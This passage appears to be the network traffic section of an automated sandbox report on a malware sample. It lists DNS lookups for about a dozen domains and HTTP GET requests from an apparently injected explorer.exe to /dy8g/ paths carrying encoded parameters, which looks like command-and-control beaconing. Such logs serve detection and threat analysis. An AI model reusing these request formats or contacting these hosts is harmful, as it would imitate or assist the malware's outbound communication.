Jun 22, 2021 18:25:12.875062943 CEST | 192.168.2.6 | 8.8.8.8 | 0x6cad | Standard query (0) | www.ivoirepneus.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:18.198398113 CEST | 192.168.2.6 | 8.8.8.8 | 0x5255 | Standard query (0) | www.extinctionbrews.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:23.461308002 CEST | 192.168.2.6 | 8.8.8.8 | 0x14f9 | Standard query (0) | www.cindywillardrealtor.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:28.739301920 CEST | 192.168.2.6 | 8.8.8.8 | 0x2779 | Standard query (0) | www.doityourselfism.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:34.369805098 CEST | 192.168.2.6 | 8.8.8.8 | 0x5716 | Standard query (0) | www.saludflv.info | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:39.699645996 CEST | 192.168.2.6 | 8.8.8.8 | 0xc48e | Standard query (0) | www.builtbydawn.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:44.923053980 CEST | 192.168.2.6 | 8.8.8.8 | 0xeaa6 | Standard query (0) | www.qq66520.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:50.441529036 CEST | 192.168.2.6 | 8.8.8.8 | 0xf777 | Standard query (0) | www.mzyxi-rkah-y.net | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:01.347481966 CEST | 192.168.2.6 | 8.8.8.8 | 0x84be | Standard query (0) | www.avito-payment.life | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:06.486386061 CEST | 192.168.2.6 | 8.8.8.8 | 0x2016 | Standard query (0) | www.thenorthgoldline.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:11.774780035 CEST | 192.168.2.6 | 8.8.8.8 | 0x5665 | Standard query (0) | www.guys-only.com | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:17.734756947 CEST | 192.168.2.6 | 8.8.8.8 | 0xfb0d | Standard query (0) | www.wideawakemomma.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 22, 2021 18:25:02.361603022 CEST | 8.8.8.8 | 192.168.2.6 | 0xaf89 | No error (0) | www.invisiongc.net | invisiongc.net |  | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:02.361603022 CEST | 8.8.8.8 | 192.168.2.6 | 0xaf89 | No error (0) | invisiongc.net |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:07.642466068 CEST | 8.8.8.8 | 192.168.2.6 | 0x7d4c | No error (0) | www.killrstudio.com | killrstudio.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:07.642466068 CEST | 8.8.8.8 | 192.168.2.6 | 0x7d4c | No error (0) | killrstudio.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:12.949099064 CEST | 8.8.8.8 | 192.168.2.6 | 0x6cad | No error (0) | www.ivoirepneus.com |  | 213.186.33.5 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:18.266730070 CEST | 8.8.8.8 | 192.168.2.6 | 0x5255 | No error (0) | www.extinctionbrews.com | extinctionbrews.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:18.266730070 CEST | 8.8.8.8 | 192.168.2.6 | 0x5255 | No error (0) | extinctionbrews.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:23.532597065 CEST | 8.8.8.8 | 192.168.2.6 | 0x14f9 | No error (0) | www.cindywillardrealtor.com | cindywillardrealtor.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:23.532597065 CEST | 8.8.8.8 | 192.168.2.6 | 0x14f9 | No error (0) | cindywillardrealtor.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:28.953159094 CEST | 8.8.8.8 | 192.168.2.6 | 0x2779 | No error (0) | www.doityourselfism.com | doityourselfism.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:25:28.953159094 CEST | 8.8.8.8 | 192.168.2.6 | 0x2779 | No error (0) | doityourselfism.com |  | 169.62.77.158 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:34.678531885 CEST | 8.8.8.8 | 192.168.2.6 | 0x5716 | Server failure (2) | www.saludflv.info | none | none | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:39.783648968 CEST | 8.8.8.8 | 192.168.2.6 | 0xc48e | No error (0) | www.builtbydawn.com |  | 172.67.129.33 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:39.783648968 CEST | 8.8.8.8 | 192.168.2.6 | 0xc48e | No error (0) | www.builtbydawn.com |  | 104.21.2.115 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:44.998709917 CEST | 8.8.8.8 | 192.168.2.6 | 0xeaa6 | No error (0) | www.qq66520.com |  | 166.88.88.176 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:25:50.750444889 CEST | 8.8.8.8 | 192.168.2.6 | 0xf777 | No error (0) | www.mzyxi-rkah-y.net |  | 52.79.124.173 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:01.425106049 CEST | 8.8.8.8 | 192.168.2.6 | 0x84be | Name error (3) | www.avito-payment.life | none | none | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:06.553442001 CEST | 8.8.8.8 | 192.168.2.6 | 0x2016 | No error (0) | www.thenorthgoldline.com | 825610.parkingcrew.net |  | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:26:06.553442001 CEST | 8.8.8.8 | 192.168.2.6 | 0x2016 | No error (0) | 825610.parkingcrew.net |  | 75.2.81.221 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:11.852895021 CEST | 8.8.8.8 | 192.168.2.6 | 0x5665 | No error (0) | www.guys-only.com |  | 154.196.232.108 | A (IP address) | IN (0x0001)
Jun 22, 2021 18:26:17.813395023 CEST | 8.8.8.8 | 192.168.2.6 | 0xfb0d | No error (0) | www.wideawakemomma.com | wideawakemomma.com |  | CNAME (Canonical name) | IN (0x0001)
Jun 22, 2021 18:26:17.813395023 CEST | 8.8.8.8 | 192.168.2.6 | 0xfb0d | No error (0) | wideawakemomma.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.invisiongc.net
• www.killrstudio.com
• www.ivoirepneus.com
• www.extinctionbrews.com
• www.cindywillardrealtor.com
• www.doityourselfism.com
• www.builtbydawn.com
• www.qq66520.com
• www.mzyxi-rkah-y.net
• www.thenorthgoldline.com
• www.guys-only.com
• www.wideawakemomma.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49756 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:02.409568071 CEST | 4856 | OUT | GET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1
Host: www.invisiongc.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:02.550642014 CEST | 4857 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Tue, 22 Jun 2021 16:25:02 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60c7be46-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49757 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:07.686913967 CEST | 5602 | OUT | GET /dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 HTTP/1.1
Host: www.killrstudio.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:25:07.827526093 CEST | 5603 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Tue, 22 Jun 2021 16:25:07 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60cf306c-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49772 | 154.196.232.108 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:26:12.087053061 CEST | 5669 | OUT | GET /dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 HTTP/1.1
Host: www.guys-only.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:26:12.319773912 CEST | 5669 | IN | HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Server: Nginx Microsoft-HTTPAPI/2.0
X-Powered-By: Nginx
Date: Tue, 22 Jun 2021 16:26:14 GMT
Connection: close
Data Raw: 33 0d 0a ef bb bf 0d 0a
Data Ascii: 3


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.6 | 49773 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:26:17.859261036 CEST | 5670 | OUT | GET /dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== HTTP/1.1
Host: www.wideawakemomma.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 22, 2021 18:26:17.999823093 CEST | 5671 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Tue, 22 Jun 2021 16:26:17 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60c7be46-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49758 | Destination IP: 213.186.33.5 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:13.103247881 CEST | 5616 | OUT | GET /dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== HTTP/1.1
                                                                                                                        Host: www.ivoirepneus.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 22, 2021 18:25:13.156203032 CEST | 5617 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:13 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 138
                                                                                                                        Connection: close
                                                                                                                        Location: http://www.ivoirepneus.com
                                                                                                                        X-IPLB-Instance: 16978
                                                                                                                        Set-Cookie: SERVERID77446=200178|YNIO7|YNIO7; path=/
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 3 | Source IP: 192.168.2.6 | Source Port: 49759 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:18.311331034 CEST | 5617 | OUT | GET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.extinctionbrews.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 22, 2021 18:25:18.451875925 CEST | 5618 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:18 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 4 | Source IP: 192.168.2.6 | Source Port: 49760 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:23.578876019 CEST | 5619 | OUT | GET /dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== HTTP/1.1
                                                                                                                        Host: www.cindywillardrealtor.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 22, 2021 18:25:23.719109058 CEST | 5619 | IN | HTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:23 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60c7be46-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 49761 | Destination IP: 169.62.77.158 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:29.144289017 CEST | 5620 | OUT | GET /dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.doityourselfism.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 22, 2021 18:25:29.339704037 CEST | 5621 | IN | HTTP/1.1 302 Found
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:29 GMT
                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 mod_apreq2-20090110/2.8.0 mod_perl/2.0.11 Perl/v5.16.3
                                                                                                                        Location: http://ww1.doityourselfism.com/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0
                                                                                                                        Content-Length: 310
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 31 2e 64 6f 69 74 79 6f 75 72 73 65 6c 66 69 73 6d 2e 63 6f 6d 2f 3f 41 34 4c 6c 3d 59 34 4a 42 66 42 6a 42 4b 4d 47 7a 62 55 7a 72 4e 75 2b 41 52 4c 4b 34 5a 51 61 62 2b 64 61 70 31 6b 71 34 30 59 53 76 71 53 7a 79 4a 2f 6d 66 52 67 34 55 39 2b 4c 7a 31 65 4b 4a 66 52 4c 4b 33 63 41 6d 61 61 30 62 6b 77 3d 3d 26 61 6d 70 3b 36 6c 2d 3d 36 6c 59 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://ww1.doityourselfism.com/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&amp;6l-=6lY0">here</a>.</p></body></html>


Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 49766 | Destination IP: 172.67.129.33 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:39.828190088 CEST | 5640 | OUT | GET /dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 HTTP/1.1
                                                                                                                        Host: www.builtbydawn.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 22, 2021 18:25:39.894753933 CEST | 5641 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:39 GMT
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Expires: Tue, 22 Jun 2021 17:25:39 GMT
                                                                                                                        Location: https://www.builtbydawn.com/dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0
                                                                                                                        cf-request-id: 0ad623bf16000032447085d000000001
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4LSx3QPsSWq1uFYqrGXbf8LvK1fi%2FqXets7CKG0Y5i4lubM%2FgteHR997gQM%2Fu7raxmn7xfaolxGhWAY%2BOTOcGXlJL4wtWIlhfMZa30mFTKXBc%2FKatV97PIcqd6Ev1fr0Ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 6636d5782cbf3244-FRA
                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


Session ID: 7 | Source IP: 192.168.2.6 | Source Port: 49767 | Destination IP: 166.88.88.176 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 22, 2021 18:25:45.192420959 CEST | 5643 | OUT | GET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1
                                                                                                                        Host: www.qq66520.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
Jun 22, 2021 18:25:45.386563063 CEST | 5644 | IN | HTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 22 Jun 2021 16:25:45 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 4861
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d7 f1 d2 e5 d2 d3 c9 d5 b5 e7 d7 d3 c9 cc ce f1 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 35 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 36 36 38 31 3b 26 23 32 35 31 36 33 3b 26 23 32 35 33 35 31 3b 26 23 32 33 36 30 31 3b 26 23 32 31 38 39 38 3b 26 23 33 30 31 34 30 3b 26 23 32 30 31 30 32 3b 26 23 39 35 3b 26 23 32 33 35 36 37 3b 26 23 31 39 39 39 36 3b 26 23 33 35 31 39 39 3b 26 23 32 30 33 32 30 3b 26 23 32 36 31 35 39 3b 26 23 31 39 39 38 31 3b 26 23 32 36 31 35 39 3b 26 23 32 37 34 32 34 3b 26 23 39 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 38 34 30 35 3b 26 23 33 